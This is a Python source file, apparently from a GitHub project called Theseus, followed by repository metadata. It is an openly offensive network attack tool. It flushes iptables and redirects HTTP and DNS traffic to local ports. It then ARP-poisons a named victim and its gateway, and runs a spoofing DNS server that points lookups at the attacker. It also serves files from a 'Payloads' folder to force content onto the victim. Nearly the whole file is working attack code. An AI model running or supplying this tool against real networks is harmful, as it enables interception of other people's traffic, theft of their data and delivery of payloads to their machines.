ap.add_argument("--spoof", help="Type of spoof (arp)", required=True)
args = ap.parse_args()
log.status("Configuring iptables")
#Configure kernal and iptables for the attack, change echo value to 0 if doesn't work
os.popen("{ echo 1 > /proc/sys/net/ipv4/ip_forward;\
iptables --flush;\
iptables --flush -t nat;\
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000;\
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 5000; }") #Changed IP Forwarding
# Load Setting From Config file
local = os.popen('ifconfig | grep -Eo \'inet (addr:)?([0-9]*\.){3}[0-9]*\' | grep -Eo \'([0-9]*\.){3}[0-9]*\' | grep -v \'127.0.0.1\'').read().strip('\n')
payloads_folder = 'server/Payloads'
verbose = 5
#Handle any possable errors from args
try:
int(verbose)
except ValueError:
print("\033[1;31mTime must be whole number\033[00m")
exit()
try:
socket.inet_aton(args.target)
socket.inet_aton(args.gateway)
except socket.error:
print("\033[1;31mIncorrect IP address\033[00m")
exit()
if args.target_mac:
if re.match("[0-9a-f]{2}([-:])[0-9a-f]{2}(\\1[0-9a-f]{2}){4}$", args.target_mac) != None:
tm = args.target_mac
pass
else:
print("\033[1;31mInvalid mac address\033[00m")
tm = None
exit()
else:
pass
def dns_spoof(self, dns, *args):
redirect_ip = args[0]
while True:
raw, addr = dns.await_responce()
dns.send_reply(addr, raw, redirect_ip)
def attack_dns_spoof(self):
dns = DNS_Server(local)
jobs = []
for i in range(4):
p = multiprocessing.Process(target=self.dns_spoof, args=(dns, local))
jobs.append(p)
p.start()
def arp_spoof(self, tm):
arp = Arp_Spoof(args.iface)
try:
log.status("{} ({}) is at {}".format(socket.gethostbyaddr(args.target)[0], args.target, tm))
except socket.herror:
log.warn("{} is at {}".format(args.target, tm))
ajobs = []
victim_thread = multiprocessing.Process(target=arp.poison_victim, args=(args.target, args.gateway, int(verbose), args.iface, tm))
ajobs.append(victim_thread)
victim_thread.start()
try:
vname = socket.gethostbyaddr(args.target)[0]
vname = vname.replace('.home', " ")
log.status("Started attack on {}".format(vname))
except socket.herror:
log.warn("Started attack on {}".format(args.target))
target_thread = multiprocessing.Process(target=arp.poison_router, args=(args.gateway, args.target, int(verbose), args.iface, tm))
ajobs.append(victim_thread)
target_thread.start()
try:
rname = socket.gethostbyaddr(args.gateway)[0]
rname = rname.replace('.home', " ")
log.status("Started attack on {}".format(rname))
except socket.herror:
log.warn("Started attack on {}".format(args.target))
def arp_ping(self):
p = Arp_Ping(args.iface)
p.ping(args.target, local, args.iface)
while True:
tm = p.await_responce(args.iface)
try:
if len(tm) != 0:
break
except TypeError: pass
return tm[0]
def force_content(self):
http_Server = HTTP_Server(local, payloads_folder)
log.status("Started HTTP server on port 9000\n")
jobs = []
for i in range(4):
p = multiprocessing.Process(target=http_Server._http_client_handler, args=(payloads_folder))
jobs.append(p)
p.start()
if __name__ == '__main__':
b = New_Banner()
print("\033[1;3m"+b.new()+"\033[00m")
t = Theseus()
t.attack_dns_spoof()
log.status("Started DNS server")
if args.arp_ping:
log.status("Sending arp ping to {}".format(args.target))
tm = t.arp_ping()
if 'arp' in args.spoof:
t.arp_spoof(tm)
if args.force_content:
t.force_content()
|
{
"content_hash": "b5cadec869376ee9ab8681e400334a5a",
"timestamp": "",
"source": "github",
"line_count": 151,
"max_line_length": 156,
"avg_line_length": 33.4635761589404,
"alnum_prop": 0.6698990698594894,
"repo_name": "Dylan-halls/Theseus",
"id": "675e627f3d9c0a1e48cdbfa7f8686e7e3ba2a9d7",
"size": "5053",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/Theseus.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "207"
},
{
"name": "HTML",
"bytes": "488"
},
{
"name": "JavaScript",
"bytes": "2823"
},
{
"name": "Python",
"bytes": "187593"
}
],
"symlink_target": ""
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.